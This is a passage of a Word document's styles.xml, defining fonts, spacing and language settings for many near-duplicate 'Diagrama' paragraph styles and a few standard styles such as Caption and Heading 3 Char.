    <w:name w:val="Diagrama0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007D6C3C"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="007D6C3C"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid0">
    <w:name w:val="Table Grid0"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007D6C3C"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007D6C3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="007D6C3C"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00">
    <w:name w:val="Diagrama00"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007D6C3C"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c-header-singlecategory">
    <w:name w:val="c-header-single__category"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D22D8E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000">
    <w:name w:val="Diagrama000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006B05A4"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000">
    <w:name w:val="Diagrama0000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D70D47"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000">
    <w:name w:val="Diagrama00000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FB3ACA"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000">
    <w:name w:val="Diagrama000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F855D5"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000">
    <w:name w:val="Diagrama0000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00EB1DEC"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000">
    <w:name w:val="Diagrama00000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A56DB7"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author-name">
    <w:name w:val="author-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00592827"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000">
    <w:name w:val="Diagrama000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00640B8A"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000">
    <w:name w:val="Diagrama0000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00674BB6"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000">
    <w:name w:val="Diagrama00000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C83AD3"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000">
    <w:name w:val="Diagrama000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004771AD"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000">
    <w:name w:val="Diagrama0000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0084614C"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000">
    <w:name w:val="Diagrama00000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0059322C"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000">
    <w:name w:val="Diagrama000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00225D5B"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000">
    <w:name w:val="Diagrama0000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00357ACE"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000">
    <w:name w:val="Diagrama00000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00E83AC0"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000">
    <w:name w:val="Diagrama000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0071254A"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000">
    <w:name w:val="Diagrama0000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006D698E"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000">
    <w:name w:val="Diagrama00000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002D6D40"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004064E2"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00E32988"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00885535"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006C570B"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002075A4"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00672394"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AF0BF6"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0036167E"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00750DA7"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C90419"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007C1BF1"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000B6E18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000B6E18"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00CC2CF5"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00580EDD"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DD52D7"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000110C8"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0000000000000000000000000000000000000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A51330"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama00000000000000000000000000000000000000">
    <w:name w:val="Diagrama00000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000A63A2"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama000000000000000000000000000000000000000">
    <w:name w:val="Diagrama000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000B2C6B"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D222DC"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009A683E"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00133EB4"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00736058"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DB0FC5"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005F73F7"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009E5363"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00653B61"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F52FC0"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D90F26"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C950D0"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FF7FFA"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006B270D"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C15321"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00512D25"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002030BE"/>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
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A4122B"/>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
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005347B5"/>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
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003F26E7"/>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0">
    <w:name w:val="Diagrama00000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007E7D53"/>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00">
    <w:name w:val="Diagrama000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="006026C9"/>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000">
    <w:name w:val="Diagrama0000000000000000000000000000000000000000000000000000000000000"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001822E6"/>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0000">
